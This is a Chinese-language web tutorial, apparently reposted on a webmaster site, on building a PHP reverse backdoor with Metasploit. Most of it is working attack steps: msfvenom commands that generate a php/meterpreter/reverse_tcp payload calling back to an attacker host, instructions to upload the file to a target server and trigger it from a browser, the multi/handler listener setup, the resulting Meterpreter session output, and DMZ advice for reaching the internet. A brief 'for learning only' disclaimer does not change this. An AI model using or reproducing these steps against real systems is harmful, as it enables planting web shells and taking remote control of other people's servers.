metasploit框架PHP反向后门建立教程
发布时间:2022-02-24 13:21:49 所属栏目:PHP教程 来源:互联网
导读:Metasploit简介 灰帽黑客(第3版) Metasploit是一个免费的、可下载的框架,通过它可以很容易地获
Metasploit简介 灰帽黑客(第3版) Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户 metasploit框架PHP反向后门建立 msfvenom -l 查看所有payload Framework Payloads (436 total) ============================== Name Description ---- ----------- aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell aix/ppc/shell_find_port Spawn a shell on an established connection aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs) aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell 其他的省略。 这里要使用的是PHP反向后门 msfvenom -p php/meterpreter/reverse_tcp --payload-options 查看参数 Options for payload/php/meterpreter/reverse_tcp: Name: PHP Meterpreter, PHP Reverse TCP Stager Module: payload/php/meterpreter/reverse_tcp Platform: PHP Arch: php Needs Admin: No Total size: 936 Rank: Normal Provided by: egypt <egypt@metasploit.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Description: Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw >c.php 生成脚本 生成后要将脚本最前面的注释符去掉,然后上传到目标服务器上 启动msf use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.2 set LPORT 1234 exploit 启动监听 然后从浏览器中打开上传的脚本http://xxx.com/c.php msf中就会看到 *] Starting the payload handler... [*] Sending stage (33068 bytes) to XXX.XXX.XXX.XXX [*] Meterpreter session 1 opened (192.168.1.2:1234 -> xxx.xxx.xxx.xxx:42280) at meterpreter > 如果kali安装在虚拟机上,需要桥接,然后路由器上将kali DMZ到外网 注意:此教程只用于学习使用其它一切后果与本站无关。 (编辑:滁州站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |